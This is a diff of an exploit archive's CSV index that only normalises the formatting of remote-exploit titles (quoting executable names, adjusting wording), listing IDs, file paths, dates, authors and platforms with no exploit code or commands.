17409,platforms/windows/remote/17409.rb,"Microsoft Internet Explorer - MSHTML!CObjectElement Use-After-Free (MS11-050) (Metasploit)",2011-06-17,Metasploit,windows,remote,0 17415,platforms/windows/remote/17415.rb,"Black Ice Cover Page SDK - insecure method DownloadImageFileURL() Exploit (Metasploit)",2011-06-20,mr_me,windows,remote,0 @@ -11396,7 +11407,7 @@ id,file,description,date,author,platform,type,port 17419,platforms/windows/remote/17419.zip,"Mozilla Firefox - 'nsTreeRange' Dangling Pointer (2)",2011-06-20,Abysssec,windows,remote,0 17422,platforms/hardware/remote/17422.txt,"DreamBox DM800 - Arbitrary File Download",2011-06-21,ShellVision,hardware,remote,0 17424,platforms/windows/remote/17424.rb,"Black Ice Cover Page - ActiveX Control Arbitrary File Download (Metasploit)",2011-06-21,Metasploit,windows,remote,0 -17429,platforms/windows/remote/17429.rb,"FactoryLink - vrn.exe Opcode 9 Buffer Overflow (Metasploit)",2011-06-21,Metasploit,windows,remote,0 +17429,platforms/windows/remote/17429.rb,"FactoryLink - 'vrn.exe' Opcode 9 Buffer Overflow (Metasploit)",2011-06-21,Metasploit,windows,remote,0 17430,platforms/windows/remote/17430.rb,"Sielco Sistemi Winlog - Buffer Overflow (Metasploit)",2011-06-21,Metasploit,windows,remote,0 17434,platforms/windows/remote/17434.rb,"RealWin SCADA Server - DATAC Login Buffer Overflow (Metasploit)",2011-06-22,Metasploit,windows,remote,0 17438,platforms/windows/remote/17438.txt,"IBM Web Application Firewall - Bypass Exploit",2011-06-23,"Trustwave's SpiderLabs",windows,remote,0 @@ -11404,7 +11415,7 @@ id,file,description,date,author,platform,type,port 17448,platforms/windows/remote/17448.rb,"Lotus Notes 8.0.x < 8.5.2 FP2 - Autonomy Keyview ('.lzh' Attachment) (Metasploit)",2011-06-23,Metasploit,windows,remote,0 17460,platforms/windows/remote/17460.pl,"Kaillera - Multiple Clients Buffer Overflow Vulnerabilities",2011-06-30,Sil3nt_Dre4m,windows,remote,0 17462,platforms/freebsd/remote/17462.txt,"FreeBSD OpenSSH 3.5p1 - Remote Command Execution",2011-06-30,kingcope,freebsd,remote,0 -17467,platforms/windows/remote/17467.rb,"HP - OmniInet.exe Opcode 27 Buffer Overflow (Metasploit)",2011-07-01,Metasploit,windows,remote,5555 +17467,platforms/windows/remote/17467.rb,"HP - 'OmniInet.exe' Opcode 27 Buffer Overflow (Metasploit)",2011-07-01,Metasploit,windows,remote,5555 17468,platforms/windows/remote/17468.py,"HP Data Protector 6.11 - Remote Buffer Overflow (DEP Bypass)",2011-07-02,"muts and dookie",windows,remote,5555 17490,platforms/windows/remote/17490.rb,"HP OmniInet.exe Opcode 20 - Buffer Overflow (Metasploit)",2011-07-04,Metasploit,windows,remote,0 17491,platforms/unix/remote/17491.rb,"vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)",2011-07-05,Metasploit,unix,remote,0 @@ -11413,12 +11424,12 @@ id,file,description,date,author,platform,type,port 39661,platforms/windows/remote/39661.rb,"Easy File Sharing HTTP Server 7.2 - Overflow (SEH) (Metasploit)",2016-04-05,Metasploit,windows,remote,80 39662,platforms/windows/remote/39662.rb,"PCMan FTP Server Buffer Overflow - 'PUT' Command (Metasploit)",2016-04-05,Metasploit,windows,remote,21 17513,platforms/windows/remote/17513.rb,"Blue Coat Authentication and Authorization Agent (BCAAA) 5 - Buffer Overflow (Metasploit)",2011-07-09,Metasploit,windows,remote,0 -17517,platforms/windows/remote/17517.txt,"Symantec Backup Exec 12.5 - MiTM Attack",2011-07-09,Nibin,windows,remote,0 +17517,platforms/windows/remote/17517.txt,"Symantec Backup Exec 12.5 - Man In The Middle Exploit",2011-07-09,Nibin,windows,remote,0 17519,platforms/windows/remote/17519.py,"Freefloat FTP Server - 'LIST' Command Buffer Overflow",2011-07-10,"Zer0 Thunder",windows,remote,0 17520,platforms/windows/remote/17520.rb,"Mozilla Firefox - 'nsTreeRange' Dangling Pointer (Metasploit) (1)",2011-07-10,Metasploit,windows,remote,0 17527,platforms/windows/remote/17527.py,"Solar FTP Server 2.1.1 - PASV Buffer Overflow (PoC)",2011-07-12,"Craig Freyman",windows,remote,0 17535,platforms/multiple/remote/17535.rb,"Java RMI - Server Insecure Default Configuration Java Code Execution (Metasploit)",2011-07-15,Metasploit,multiple,remote,0 -17537,platforms/windows/remote/17537.rb,"HP OpenView Network Node Manager - Toolbar.exe CGI Cookie Handling Buffer Overflow (Metasploit)",2011-07-16,Metasploit,windows,remote,0 +17537,platforms/windows/remote/17537.rb,"HP OpenView Network Node Manager (OV NNM) - 'Toolbar.exe' CGI Cookie Handling Buffer Overflow (Metasploit)",2011-07-16,Metasploit,windows,remote,0 17539,platforms/windows/remote/17539.rb,"Freefloat FTP Server 1.0 - 'MKD' Buffer Overflow",2011-07-17,"C4SS!0 G0M3S",windows,remote,0 17540,platforms/windows/remote/17540.rb,"Freefloat FTP Server - 'MKD' Buffer Overflow (Metasploit)",2011-07-18,"James Fitts",windows,remote,0 17543,platforms/windows/remote/17543.rb,"Iconics GENESIS32 9.21.201.01 - Integer Overflow (Metasploit)",2011-07-17,Metasploit,windows,remote,0 @@ -11450,11 +11461,11 @@ id,file,description,date,author,platform,type,port 17699,platforms/windows/remote/17699.rb,"Symantec System Center Alert Management System - 'xfr.exe' Arbitrary Command Execution (Metasploit)",2011-08-19,Metasploit,windows,remote,0 17700,platforms/windows/remote/17700.rb,"Symantec System Center Alert Management System - 'hndlrsvc.exe' Arbitrary Command Execution (Metasploit)",2011-08-19,Metasploit,windows,remote,0 17719,platforms/windows/remote/17719.rb,"RealVNC - Authentication Bypass (Metasploit)",2011-08-26,Metasploit,windows,remote,0 -17721,platforms/windows/remote/17721.rb,"Sunway Force Control SCADA 6.1 SP3 - httpsrv.exe Exploit",2011-08-26,"Canberk BOLAT",windows,remote,0 +17721,platforms/windows/remote/17721.rb,"Sunway Force Control SCADA 6.1 SP3 - 'httpsrv.exe' Exploit",2011-08-26,"Canberk BOLAT",windows,remote,0 17762,platforms/windows/remote/17762.rb,"Citrix Gateway - ActiveX Control Stack Based Buffer Overflow (Metasploit)",2011-08-31,Metasploit,windows,remote,0 17810,platforms/windows/remote/17810.rb,"BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow (Metasploit)",2011-09-09,"SecPod Research",windows,remote,0 17819,platforms/windows/remote/17819.py,"KnFTP Server - Buffer Overflow",2011-09-12,blake,windows,remote,0 -17827,platforms/windows/remote/17827.rb,"Procyon Core Server HMI 1.13 - Coreservice.exe Stack Buffer Overflow (Metasploit)",2011-09-12,Metasploit,windows,remote,0 +17827,platforms/windows/remote/17827.rb,"Procyon Core Server HMI 1.13 - 'Coreservice.exe' Stack Buffer Overflow (Metasploit)",2011-09-12,Metasploit,windows,remote,0 17848,platforms/windows/remote/17848.rb,"Measuresoft ScadaPro 4.0.0 - Remote Command Execution (Metasploit)",2011-09-16,Metasploit,windows,remote,0 17849,platforms/windows/remote/17849.rb,"RealNetworks Realplayer - QCP Parsing Heap Overflow (Metasploit)",2011-09-17,Metasploit,windows,remote,0 17855,platforms/windows/remote/17855.rb,"DaqFactory - HMI NETB Request Overflow (Metasploit)",2011-09-18,Metasploit,windows,remote,0 @@ -11520,12 +11531,12 @@ id,file,description,date,author,platform,type,port 18401,platforms/windows/remote/18401.py,"Savant Web Server 3.1 - Buffer Overflow (Egghunter)",2012-01-21,red-dragon,windows,remote,0 18697,platforms/windows/remote/18697.rb,"NetOp Remote Control Client 9.5 - Buffer Overflow (Metasploit)",2012-04-04,Metasploit,windows,remote,0 18420,platforms/windows/remote/18420.rb,"Sysax Multi Server 5.50 - Create Folder Remote Code Execution Buffer Overflow (Metasploit)",2012-01-26,"Craig Freyman",windows,remote,0 -18423,platforms/windows/remote/18423.rb,"HP Diagnostics Server - magentservice.exe Overflow (Metasploit)",2012-01-27,Metasploit,windows,remote,0 +18423,platforms/windows/remote/18423.rb,"HP Diagnostics Server - 'magentservice.exe' Overflow (Metasploit)",2012-01-27,Metasploit,windows,remote,0 18426,platforms/windows/remote/18426.rb,"Microsoft Windows - midiOutPlayNextPolyEvent Heap Overflow (MS12-004) (Metasploit)",2012-01-28,Metasploit,windows,remote,0 18437,platforms/windows/remote/18437.txt,"Adobe Flash Player - MP4 SequenceParameterSetNALUnit Remote Code Execution",2012-01-31,Abysssec,windows,remote,0 18442,platforms/multiple/remote/18442.html,"Apache - httpOnly Cookie Disclosure",2012-01-31,pilate,multiple,remote,0 18446,platforms/android/remote/18446.html,"Webkit Normalize Bug - Android 2.2",2012-02-01,"MJ Keith",android,remote,0 -18448,platforms/windows/remote/18448.rb,"Sunway ForceControl - SNMP NetDBServer.exe Opcode 0x57 (Metasploit)",2012-02-02,Metasploit,windows,remote,0 +18448,platforms/windows/remote/18448.rb,"Sunway ForceControl - SNMP 'NetDBServer.exe' Opcode 0x57 (Metasploit)",2012-02-02,Metasploit,windows,remote,0 18449,platforms/windows/remote/18449.rb,"Icona SpA C6 Messenger - DownloaderActiveX Control Arbitrary File Download and Execute (Metasploit)",2012-02-02,Metasploit,windows,remote,0 18476,platforms/windows/remote/18476.py,"Sysax Multi Server 5.52 - File Rename Buffer Overflow Remote Code Execution (Egghunter)",2012-02-09,"Craig Freyman",windows,remote,0 18478,platforms/windows/remote/18478.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020000 Buffer Overflow (Metasploit)",2012-02-10,Metasploit,windows,remote,0 @@ -11533,7 +11544,7 @@ id,file,description,date,author,platform,type,port 18485,platforms/windows/remote/18485.rb,"Java MixerSequencer Object - GM_Song Structure Handling (Metasploit)",2012-02-16,Metasploit,windows,remote,0 18492,platforms/linux/remote/18492.rb,"Horde 3.3.12 - Backdoor Arbitrary PHP Code Execution (Metasploit)",2012-02-17,Metasploit,linux,remote,0 18520,platforms/windows/remote/18520.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (2012) (Metasploit)",2012-02-24,Metasploit,windows,remote,0 -18514,platforms/windows/remote/18514.rb,"Trend Micro Control Manger 5.5 - CmdProcessor.exe Stack Buffer Overflow (Metasploit)",2012-02-23,Metasploit,windows,remote,0 +18514,platforms/windows/remote/18514.rb,"Trend Micro Control Manger 5.5 - 'CmdProcessor.exe' Stack Buffer Overflow (Metasploit)",2012-02-23,Metasploit,windows,remote,0 18521,platforms/windows/remote/18521.rb,"HP Data Protector 6.1 - EXEC_CMD Remote Code Execution (Metasploit)",2012-02-25,Metasploit,windows,remote,0 18531,platforms/windows/remote/18531.html,"Mozilla Firefox 4.0.1 - Array.reduceRight() Exploit",2012-02-27,pa_kt,windows,remote,0 18534,platforms/windows/remote/18534.py,"Sysax Multi Server 5.53 - SFTP Authenticated (SEH)",2012-02-27,"Craig Freyman",windows,remote,0 @@ -11785,7 +11796,7 @@ id,file,description,date,author,platform,type,port 19618,platforms/windows/remote/19618.txt,"Microsoft Internet Explorer 5 Media Player - ActiveX Error Message",1999-11-14,"Georgi Guninski",windows,remote,0 19620,platforms/unix/remote/19620.txt,"Matt Wright - FormHandler.cgi 2.0 Reply Attachment",1999-11-16,m4rcyS,unix,remote,0 19621,platforms/windows/remote/19621.c,"Admiral Systems EmailClub 1.0.0.5 - Buffer Overflow",1999-11-15,UNYUN,windows,remote,0 -19622,platforms/windows/remote/19622.c,"Antelope Software W4-Server 2.6 a/Win32 - Cgitest.exe Buffer Overflow",1999-11-15,UNYUN,windows,remote,0 +19622,platforms/windows/remote/19622.c,"Antelope Software W4-Server 2.6 a/Win32 - 'Cgitest.exe' Buffer Overflow",1999-11-15,UNYUN,windows,remote,0 19623,platforms/windows/remote/19623.c,"International TeleCommunications WebBBS 2.13 - login & Password Buffer Overflow",1999-11-15,UNYUN,windows,remote,0 19625,platforms/windows/remote/19625.py,"ALLMediaServer 0.8 - Overflow (SEH)",2012-07-06,"motaz reda",windows,remote,888 19632,platforms/hardware/remote/19632.txt,"Tektronix Phaser Network Printer 740/750/750DP/840/930 PhaserLink WebServer - Retrieve Administrator Password",1999-11-17,"Dennis W. Mattison",hardware,remote,0 @@ -11803,7 +11814,7 @@ id,file,description,date,author,platform,type,port 19672,platforms/solaris/remote/19672.c,"Solaris 2.5/2.5.1/2.6/7.0 sadmind - Buffer Overflow (4)",1999-12-10,"Cheez Whiz",solaris,remote,0 19679,platforms/windows/remote/19679.txt,"Infoseek Ultraseek 2.1/3.1 for NT - GET Buffer Overflow",1999-12-15,"Ussr Labs",windows,remote,0 19680,platforms/sco/remote/19680.c,"SCO Unixware 7.1 - i2odialogd Remote Buffer Overflow",1999-12-22,"Brock Tellier",sco,remote,0 -19682,platforms/novell/remote/19682.txt,"Netscape Enterprise Server / Novell Groupwise 5.2/5.5 GWWEB.EXE - Multiple Vulnerabilities",1999-12-19,"Sacha Faust Bourque",novell,remote,0 +19682,platforms/novell/remote/19682.txt,"Netscape Enterprise Server / Novell Groupwise 5.2/5.5 - 'GWWEB.EXE' Multiple Vulnerabilities",1999-12-19,"Sacha Faust Bourque",novell,remote,0 19686,platforms/multiple/remote/19686.txt,"Microsoft Internet Explorer 4/5/5.5/5.0.1 - external.NavigateAndFind() Cross-Frame",1999-12-22,"Georgi Guninski",multiple,remote,0 19688,platforms/windows/remote/19688.txt,"ZBServer Pro 1.5 - Buffer Overflow (1)",1999-12-23,"Ussr Labs",windows,remote,0 19689,platforms/windows/remote/19689.c,"ZBServer Pro 1.5 - Buffer Overflow (2)",1999-12-23,Izan,windows,remote,0 @@ -11872,7 +11883,7 @@ id,file,description,date,author,platform,type,port 19905,platforms/unix/remote/19905.pl,"John Donoghue Knapster 0.9/1.3.8 - File Access",2000-05-13,no_maam,unix,remote,0 19868,platforms/linux/remote/19868.c,"LCDProc 0.4 - Buffer Overflow",2000-04-23,"Andrew Hobgood",linux,remote,0 19871,platforms/windows/remote/19871.txt,"Zone Labs ZoneAlarm 2.1 Personal Firewall - Port 67",2000-04-24,"Wally Whacker",windows,remote,0 -19877,platforms/windows/remote/19877.txt,"FrontPage 98/Personal WebServer 1.0 / Personal Web Server 2.0 - htimage.exe File Existence Disclosure",2000-04-19,Narrow,windows,remote,0 +19877,platforms/windows/remote/19877.txt,"FrontPage 98/Personal WebServer 1.0 / Personal Web Server 2.0 - 'htimage.exe' File Existence Disclosure",2000-04-19,Narrow,windows,remote,0 19879,platforms/linux/remote/19879.txt,"RedHat 6.2 Piranha Virtual Server Package - Default Account and Password",2000-04-24,"Max Vision",linux,remote,0 19881,platforms/windows/remote/19881.txt,"McMurtrey/Whitaker & Associates Cart32 2.6/3.0 - Remote Administration Password",2000-04-27,"Cerberus Security Team",windows,remote,0 19882,platforms/hardware/remote/19882.pl,"Cisco IOS 11.x/12.x - HTTP %% Exploit",2000-04-26,"Keith Woodworth",hardware,remote,0 @@ -11974,7 +11985,7 @@ id,file,description,date,author,platform,type,port 20125,platforms/windows/remote/20125.txt,"Weblogic 3.1.8/4.0.4/4.5.1 - Remote Command Execution",2000-08-01,"Foundstone Inc.",windows,remote,0 20131,platforms/multiple/remote/20131.txt,"Apache Tomcat 3.1 - Path Revealing",2000-07-20,"ET LoWNOISE",multiple,remote,0 20132,platforms/multiple/remote/20132.txt,"Tomcat 3.0/3.1 Snoop Servlet - Information Disclosure",2000-07-20,"ET LoWNOISE",multiple,remote,0 -20134,platforms/windows/remote/20134.pl,"NAI Net Tools PKI Server 1.0 - strong.exe Buffer Overflow",2000-08-02,juliano,windows,remote,0 +20134,platforms/windows/remote/20134.pl,"NAI Net Tools PKI Server 1.0 - 'strong.exe' Buffer Overflow",2000-08-02,juliano,windows,remote,0 20135,platforms/windows/remote/20135.txt,"nai net tools pki server 1.0 - Directory Traversal",2000-08-02,"Juliano Rizzo",windows,remote,0 20136,platforms/windows/remote/20136.txt,"NAI Net Tools PKI Server 1.0 - Format String",2000-08-02,"Juliano Rizzo",windows,remote,0 20139,platforms/multiple/remote/20139.txt,"Sun JDK 1.1.x / Sun JRE 1.1.x - Listening Socket",2000-08-03,"Alexey Yarovinsky",multiple,remote,0 @@ -12017,7 +12028,7 @@ id,file,description,date,author,platform,type,port 20215,platforms/multiple/remote/20215.pl,"Check Point Software Firewall-1 3.0/1 4.0/1 4.1 - Session Agent Dictionary Attack (1)",2000-08-15,"Nelson Brito",multiple,remote,0 20216,platforms/multiple/remote/20216.sh,"Check Point Software Firewall-1 3.0/1 4.0/1 4.1 - Session Agent Dictionary Attack (2)",2000-10-01,"Gregory Duchemin",multiple,remote,0 20218,platforms/cgi/remote/20218.txt,"YaBB 9.1.2000 - Arbitrary File Read",2000-09-10,pestilence,cgi,remote,0 -20220,platforms/linux/remote/20220.txt,"Mandrake 6.1/7.0/7.1 - /perl http Directory Disclosure",2000-09-11,anonymous,linux,remote,0 +20220,platforms/linux/remote/20220.txt,"Mandrake 6.1/7.0/7.1 - '/perl' HTTP Directory Disclosure",2000-09-11,anonymous,linux,remote,0 20222,platforms/windows/remote/20222.cpp,"Microsoft Windows Server 2000 - 'telnet.exe' NTLM Authentication",2000-08-14,@stake,windows,remote,0 20223,platforms/windows/remote/20223.txt,"Sambar Server 4.3/4.4 Beta 3 - Search CGI",2000-09-15,dethy,windows,remote,0 20224,platforms/windows/remote/20224.txt,"CamShot WebCam 2.6 Trial - Remote Buffer Overflow",2000-09-15,SecuriTeam,windows,remote,0 @@ -12061,7 +12072,7 @@ id,file,description,date,author,platform,type,port 20305,platforms/windows/remote/20305.txt,"Microsoft Site Server 2.0 with IIS 4.0 - Arbitrary File Upload",1999-01-30,Mnemonix,windows,remote,0 20306,platforms/windows/remote/20306.html,"Microsoft Virtual Machine - Arbitrary Java Codebase Execution",2000-10-18,"Georgi Guninski",windows,remote,0 20308,platforms/linux/remote/20308.c,"Samba 1.9.19 - Long Password Buffer Overflow",1997-09-25,root@adm.kix-azz.org,linux,remote,0 -20309,platforms/windows/remote/20309.txt,"Microsoft IIS 3.0 - newdsn.exe File Creation",1997-08-25,"Vytis Fedaravicius",windows,remote,0 +20309,platforms/windows/remote/20309.txt,"Microsoft IIS 3.0 - 'newdsn.exe' File Creation",1997-08-25,"Vytis Fedaravicius",windows,remote,0 20313,platforms/multiple/remote/20313.txt,"Allaire JRun 3 - Directory Disclosure",2000-10-23,"Foundstone Labs",multiple,remote,0 20314,platforms/multiple/remote/20314.txt,"Allaire JRun 2.3 - Arbitrary Code Execution",2000-10-23,"Foundstone Labs",multiple,remote,0 20315,platforms/multiple/remote/20315.txt,"Allaire JRun 2.3 - File Source Code Disclosure",2000-10-23,"Foundstone Labs",multiple,remote,0 @@ -12110,11 +12121,11 @@ id,file,description,date,author,platform,type,port 20434,platforms/cgi/remote/20434.txt,"Miva htmlscript 2.x - Directory Traversal",1998-01-26,"Dennis Moore",cgi,remote,0 20435,platforms/cgi/remote/20435.txt,"Apache 0.8.x/1.0.x / NCSA httpd 1.x - test-cgi Directory Listing",1996-04-01,@stake,cgi,remote,0 20441,platforms/multiple/remote/20441.txt,"IBM Net.Data 7.0 - Full Path Disclosure",2000-11-29,"Chad Kalmes",multiple,remote,0 -20442,platforms/cgi/remote/20442.html,"Greg Matthews - Classifieds.cgi 1.0 Hidden Variable",1998-12-15,anonymous,cgi,remote,0 +20442,platforms/cgi/remote/20442.html,"Greg Matthews - 'Classifieds.cgi' 1.0 Hidden Variable",1998-12-15,anonymous,cgi,remote,0 20444,platforms/cgi/remote/20444.txt,"Greg Matthews - Classifieds.cgi 1.0 MetaCharacter",1998-12-15,anonymous,cgi,remote,0 20445,platforms/windows/remote/20445.txt,"Microsoft IIS 1.0 / Netscape Server 1.0/1.12 / OReilly WebSite Professional 1.1b - '.cmd' / '.CMD' Remote Command Execution",1996-03-01,anonymous,windows,remote,0 -20446,platforms/cgi/remote/20446.txt,"WebCom datakommunikation Guestbook 0.1 - wguest.exe Arbitrary File Access",1999-04-09,Mnemonix,cgi,remote,0 -20447,platforms/cgi/remote/20447.txt,"WebCom datakommunikation Guestbook 0.1 - rguest.exe Arbitrary File Access",1999-04-09,Mnemonix,cgi,remote,0 +20446,platforms/cgi/remote/20446.txt,"WebCom datakommunikation Guestbook 0.1 - 'wguest.exe' Arbitrary File Access",1999-04-09,Mnemonix,cgi,remote,0 +20447,platforms/cgi/remote/20447.txt,"WebCom datakommunikation Guestbook 0.1 - 'rguest.exe' Arbitrary File Access",1999-04-09,Mnemonix,cgi,remote,0 20448,platforms/cgi/remote/20448.txt,"Novell NetWare Web Server 2.x - convert.bas Exploit",1996-07-03,"TTT Group",cgi,remote,0 20449,platforms/unix/remote/20449.txt,"GlimpseHTTP 1.0/2.0 / WebGlimpse 1.0 - Piped Command",1996-07-03,"Razvan Dragomirescu",unix,remote,0 20450,platforms/multiple/remote/20450.txt,"Trlinux Postaci Webmail 1.1.3 - Password Disclosure",2000-11-30,"Michael R. Rudel",multiple,remote,0 @@ -12133,7 +12144,7 @@ id,file,description,date,author,platform,type,port 20482,platforms/novell/remote/20482.txt,"Novell Netware Web Server 3.x - files.pl Exploit",1998-12-01,anonymous,novell,remote,0 20483,platforms/cgi/remote/20483.txt,"WEBgais 1.0 - websendmail Remote Command Execution",1997-07-04,"Razvan Dragomirescu",cgi,remote,0 20486,platforms/unix/remote/20486.html,"Matt Wright FormMail 1.x - Cross-Site Request Forgery",1997-01-01,anonymous,unix,remote,0 -20488,platforms/windows/remote/20488.txt,"MetaProducts Offline Explorer 1.x - File System Disclosure",2000-12-07,Dodger,windows,remote,0 +20488,platforms/windows/remote/20488.txt,"MetaProducts Offline Explorer 1.x - FileSystem Disclosure",2000-12-07,Dodger,windows,remote,0 20489,platforms/windows/remote/20489.txt,"keware technologies homeseer 1.4 - Directory Traversal",2000-12-07,"SNS Research",windows,remote,0 20490,platforms/unix/remote/20490.c,"BitchX IRC Client 1.0 c17 - DNS Buffer Overflow",2000-12-04,nimrood,unix,remote,0 20491,platforms/multiple/remote/20491.txt,"KTH Kerberos 4 - Arbitrary Proxy Usage",2000-12-08,"Jouko Pynnonen",multiple,remote,0 @@ -12402,7 +12413,7 @@ id,file,description,date,author,platform,type,port 21093,platforms/aix/remote/21093.c,"AIX 4.1/4.2 - pdnsd Buffer Overflow",1999-08-17,"Last Stage of Delirium",aix,remote,0 21095,platforms/linux/remote/21095.txt,"RedHat 6.2/7.0/7.1 Lpd - Remote Command Execution via DVI Printfilter Configuration Error",2001-08-27,"zenith parsec",linux,remote,0 21097,platforms/solaris/remote/21097.txt,"Solaris 2.x/7.0/8 LPD - Remote Command Execution",2001-08-31,ron1n,solaris,remote,0 -21100,platforms/multiple/remote/21100.pl,"Cisco Secure IDS 2.0/3.0 / Snort 1.x / ISS RealSecure 5/6 / NFR 5.0 - Encoded IIS Attack Detection Evasion",2001-09-05,blackangels,multiple,remote,0 +21100,platforms/multiple/remote/21100.pl,"Cisco Secure IDS 2.0/3.0 / Snort 1.x / ISS RealSecure 5/6 / NFR 5.0 - Encoded IIS Detection Evasion",2001-09-05,blackangels,multiple,remote,0 21102,platforms/cgi/remote/21102.txt,"Power Up HTML 0.8033 Beta - Directory Traversal Arbitrary File Disclosure",2001-09-07,"Steve Shepherd",cgi,remote,0 21104,platforms/cgi/remote/21104.pl,"Hassan Consulting Shopping Cart 1.23 - Arbitrary Command Execution",2001-09-08,"Alexey Sintsov",cgi,remote,0 21109,platforms/windows/remote/21109.c,"EFTP 2.0.7 337 - Buffer Overflow Code Execution / Denial of Service",2001-09-12,byterage,windows,remote,0 @@ -12682,7 +12693,7 @@ id,file,description,date,author,platform,type,port 21847,platforms/windows/remote/21847.rb,"Avaya IP Office Customer Call Reporter - ImageUpload.ashx Remote Command Execution (Metasploit)",2012-10-10,Metasploit,windows,remote,0 21849,platforms/unix/remote/21849.rb,"ZEN Load Balancer Filelog - Command Execution (Metasploit)",2012-10-10,Metasploit,unix,remote,444 21850,platforms/linux/remote/21850.rb,"Samba 3.4.16/3.5.14/3.6.4 - SetInformationPolicy AuditEventsInfo Heap Overflow (Metasploit)",2012-10-10,Metasploit,linux,remote,0 -21851,platforms/unix/remote/21851.rb,"Webmin 1.580 - /file/show.cgi Remote Command Execution (Metasploit)",2012-10-10,Metasploit,unix,remote,10000 +21851,platforms/unix/remote/21851.rb,"Webmin 1.580 - '/file/show.cgi' Remote Command Execution (Metasploit)",2012-10-10,Metasploit,unix,remote,10000 21852,platforms/unix/remote/21852.rb,"QNX QCONN - Remote Command Execution (Metasploit)",2012-10-10,Metasploit,unix,remote,0 21853,platforms/unix/remote/21853.txt,"Apache Tomcat 3/4 - DefaultServlet File Disclosure",2002-09-24,"Rossen Raykov",unix,remote,0 21857,platforms/linux/remote/21857.pl,"Monkey HTTP Server 0.1.4 - File Disclosure",2002-09-25,DownBload,linux,remote,0 @@ -12812,8 +12823,8 @@ id,file,description,date,author,platform,type,port 22296,platforms/multiple/remote/22296.txt,"Axis Communications HTTP Server 2.x - Messages Information Disclosure",2003-02-28,"Martin Eiszner",multiple,remote,0 22301,platforms/windows/remote/22301.html,"Aladdin Knowledge System Ltd - PrivAgent.ocx ChooseFilePath Buffer Overflow",2012-10-28,b33f,windows,remote,0 22304,platforms/multiple/remote/22304.rb,"ManageEngine Security Manager Plus 5.5 build 5505 - SQL Injection (Metasploit)",2012-10-28,Metasploit,multiple,remote,0 -22305,platforms/windows/remote/22305.rb,"HP Operations Agent Opcode - coda.exe 0x8c Buffer Overflow (Metasploit)",2012-10-29,Metasploit,windows,remote,0 -22306,platforms/windows/remote/22306.rb,"HP Operations Agent - Opcode coda.exe 0x34 Buffer Overflow (Metasploit)",2012-10-29,Metasploit,windows,remote,0 +22305,platforms/windows/remote/22305.rb,"HP Operations Agent - Opcode 'coda.exe' 0x8c Buffer Overflow (Metasploit)",2012-10-29,Metasploit,windows,remote,0 +22306,platforms/windows/remote/22306.rb,"HP Operations Agent - Opcode 'coda.exe' 0x34 Buffer Overflow (Metasploit)",2012-10-29,Metasploit,windows,remote,0 22311,platforms/cgi/remote/22311.txt,"Axis Communications Video Server 2.x - Command.cgi File Creation",2003-02-28,"Martin Eiszner",cgi,remote,0 22312,platforms/cgi/remote/22312.txt,"Apple QuickTime/Darwin Streaming Server 4.1.x - 'parse_xml.cgi' File Disclosure",2003-02-28,"Joe Testa",cgi,remote,0 22313,platforms/unix/remote/22313.c,"Sendmail 8.12.x - Header Processing Buffer Overflow (1)",2003-03-02,"Last Stage of Delirium",unix,remote,0 @@ -12850,9 +12861,9 @@ id,file,description,date,author,platform,type,port 22448,platforms/windows/remote/22448.txt,"BEA WebLogic 7.0 - Hostname/NetBIOS Name Remote Information Disclosure",2003-04-02,"Michael Hendrickx",windows,remote,0 22449,platforms/unix/remote/22449.c,"Passlog Daemon 0.1 - SL_Parse Remote Buffer Overflow (1)",2003-04-02,Xpl017Elz,unix,remote,0 22450,platforms/unix/remote/22450.c,"Passlog Daemon 0.1 - SL_Parse Remote Buffer Overflow (2)",2003-04-02,Xpl017Elz,unix,remote,0 -22453,platforms/hardware/remote/22453.txt,"Netgear FM114P ProSafe Wireless Router - UPnP Information Disclosure",2003-04-03,stickler,hardware,remote,0 +22453,platforms/hardware/remote/22453.txt,"NETGEAR FM114P ProSafe Wireless Router - UPnP Information Disclosure",2003-04-03,stickler,hardware,remote,0 22454,platforms/linux/remote/22454.c,"AutomatedShops WebC 2.0/5.0 Script - Name Remote Buffer Overrun",2003-02-16,"Carl Livitt",linux,remote,0 -22455,platforms/hardware/remote/22455.txt,"Netgear FM114P ProSafe Wireless Router - Rule Bypass",2003-04-03,stickler,hardware,remote,0 +22455,platforms/hardware/remote/22455.txt,"NETGEAR FM114P ProSafe Wireless Router - Rule Bypass",2003-04-03,stickler,hardware,remote,0 22462,platforms/multiple/remote/22462.txt,"Interbase 6.x - External Table File Verification",2003-04-05,"Kotala Zdenek",multiple,remote,0 22466,platforms/windows/remote/22466.py,"BigAnt Server 2.52 SP5 - (SEH) Stack Overflow ROP-Based Exploit (ASLR + DEP Bypass)",2012-11-04,"Lorenzo Cantoni",windows,remote,0 22468,platforms/unix/remote/22468.c,"Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (1)",2003-04-11,Xpl017Elz,unix,remote,0 @@ -12912,8 +12923,8 @@ id,file,description,date,author,platform,type,port 22664,platforms/windows/remote/22664.txt,"Sun ONE Application Server 7.0 - Source Disclosure",2003-05-27,"SPI Labs",windows,remote,0 22665,platforms/windows/remote/22665.txt,"Sun ONE Application Server 7.0 - Error Message Cross-Site Scripting",2003-05-27,"SPI Labs",windows,remote,0 22674,platforms/windows/remote/22674.txt,"M-TECH P-Synch 6.2.5 - Full Path Disclosure",2003-05-29,JeiAr,windows,remote,0 -22676,platforms/windows/remote/22676.txt,"M-TECH P-Synch 6.2.5 - nph-psf.exe css Parameter Cross-Site Scripting",2003-05-29,JeiAr,windows,remote,0 -22677,platforms/windows/remote/22677.txt,"M-TECH P-Synch 6.2.5 - nph-psa.exe css Parameter Cross-Site Scripting",2003-05-29,JeiAr,windows,remote,0 +22676,platforms/windows/remote/22676.txt,"M-TECH P-Synch 6.2.5 - 'nph-psf.exe' 'css' Parameter Cross-Site Scripting",2003-05-29,JeiAr,windows,remote,0 +22677,platforms/windows/remote/22677.txt,"M-TECH P-Synch 6.2.5 - 'nph-psa.exe' 'css' Parameter Cross-Site Scripting",2003-05-29,JeiAr,windows,remote,0 22678,platforms/windows/remote/22678.rb,"Jira Scriptrunner 2.0.7 - Cross-Site Request Forgery / Remote Code Execution (Metasploit)",2012-11-13,"Ben Sheppard",windows,remote,0 22686,platforms/php/remote/22686.rb,"Invision Power Board (IP.Board) 3.3.4 - Unserialize() PHP Code Execution (Metasploit)",2012-11-13,Metasploit,php,remote,0 22691,platforms/windows/remote/22691.txt,"pablo software Solutions baby ftp server 1.2 - Directory 